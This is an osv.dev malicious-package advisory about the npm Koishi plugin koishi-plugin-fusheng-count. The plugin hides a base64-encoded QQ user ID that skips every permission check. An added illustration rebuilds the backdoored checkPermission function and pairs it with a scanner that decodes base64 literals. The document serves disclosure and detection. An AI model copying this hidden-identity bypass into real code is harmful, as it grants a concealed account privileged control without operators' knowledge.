koishi-plugin-fusheng-count @1.0.9

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-4595

Ecosystem

npm

Summary

lib/index.js contains a base64-obfuscated hardcoded user ID (Buffer.from("Mjc1OTcyMDE2MQ==", "base64").toString("utf-8"), which decodes to QQ ID 2759720161) that is checked inside checkPermission(). When session.userId matches this hidden ID, the function returns { allowed: true } unconditionally, bypassing the plugin's documented allowedGroups whitelist and its admin/owner role gating. The backdoor is not mentioned in the README, and base64-encoding the ID shows intent to conceal the identity from operators reading the source. Any deployment of this plugin grants the hardcoded account privileged command access, including destructive operations such as 清空统计 ("clear statistics", which wipes all mention statistics), in every group the bot joins.

Source: amazon-inspector (060196a35f8eb94f7e91f892daf62aee8e293d16130565dfbc837877df264db5)
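The following Node.js script is an added illustration and is not code from koishi-plugin-fusheng-count or from the advisory source. It does two things: it models the described pattern (a decoded constant compared against session.userId ahead of the whitelist and role checks) next to a check with no hidden identity, and it scans source text for Buffer.from("<base64>", "base64") literals and decodes them so an operator can see what each one hides. Only checkPermission, session.userId, allowedGroups, { allowed: true } and the base64 literal come from the report; session.guildId, session.role, the config shape and the sample source are assumptions made for the example.

```javascript
// Added example, not code from koishi-plugin-fusheng-count. Two pieces:
// (1) a constructed permission check that reproduces the pattern the advisory
//     describes, next to a version with no hidden identity, and
// (2) a static scanner that finds Buffer.from("<base64>", "base64") literals in
//     source text and decodes them so the operator can see what they hide.
// Only checkPermission, session.userId, allowedGroups, { allowed: true } and the
// base64 literal come from the advisory; session.guildId, session.role and the
// config shape are assumptions for illustration.

// (1) Permission checks -------------------------------------------------------

// Constructed reproduction of the described pattern: the decoded constant is
// compared first, so a matching userId never reaches the whitelist or role gates.
function checkPermissionBackdoored(session, config) {
  const hiddenId = Buffer.from("Mjc1OTcyMDE2MQ==", "base64").toString("utf-8");
  if (session.userId === hiddenId) return { allowed: true };
  return checkPermissionClean(session, config);
}

// The documented behaviour without the short-circuit: every caller, whoever
// they are, passes through the same two gates. No identity constants anywhere.
function checkPermissionClean(session, config) {
  if (!config.allowedGroups.includes(session.guildId)) {
    return { allowed: false, reason: "group not in allowedGroups" };
  }
  if (!["admin", "owner"].includes(session.role)) {
    return { allowed: false, reason: "caller is not admin or owner" };
  }
  return { allowed: true };
}

// (2) Static scanner ----------------------------------------------------------

// Matches Buffer.from("<literal>", "base64") with the literal in single, double
// or back quotes. The minimum length of 8 skips tiny constants such as "AA==".
const B64_LITERAL_CALL =
  /Buffer\.from\(\s*(["'`])([A-Za-z0-9+/]{8,}={0,2})\1\s*,\s*["']base64["']\s*\)/g;

// Returns one record per decoded literal: where it is, what it decodes to, and
// whether the plaintext is a bare numeric identifier (the shape of a QQ user ID).
function findDecodedBase64Literals(source) {
  const hits = [];
  for (const m of source.matchAll(B64_LITERAL_CALL)) {
    const b64 = m[2];
    const decoded = Buffer.from(b64, "base64").toString("utf-8");
    const line = source.slice(0, m.index).split("\n").length;
    hits.push({ line, b64, decoded, numericId: /^\d{5,}$/.test(decoded) });
  }
  return hits;
}

// Constructed sample source for the scanner. It mirrors the advisory's
// description and is not the package's actual lib/index.js; the first literal
// is a benign decoy so the output shows both classifications.
const SAMPLE_SOURCE = `
const name = Buffer.from("ZnVzaGVuZy1jb3VudA==", "base64").toString("utf-8");
function checkPermission(session, config) {
  if (session.userId === Buffer.from("Mjc1OTcyMDE2MQ==", "base64").toString("utf-8")) {
    return { allowed: true };
  }
  return { allowed: config.allowedGroups.includes(session.guildId) };
}
`;

for (const hit of findDecodedBase64Literals(SAMPLE_SOURCE)) {
  const tag = hit.numericId ? "SUSPICIOUS numeric id" : "literal";
  console.log(`line ${hit.line}: ${tag} ${hit.b64} -> ${JSON.stringify(hit.decoded)}`);
}
```

To run the scanner over an installed dependency, pass the contents of node_modules/<package>/lib/index.js (read with fs.readFileSync) to findDecodedBase64Literals instead of SAMPLE_SOURCE. A literal whose plaintext is a bare numeric ID and that sits next to a comparison with session.userId is exactly the shape described in the report and warrants reading the surrounding function by hand; decoding is a heuristic, not proof, so benign constants will also be listed.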
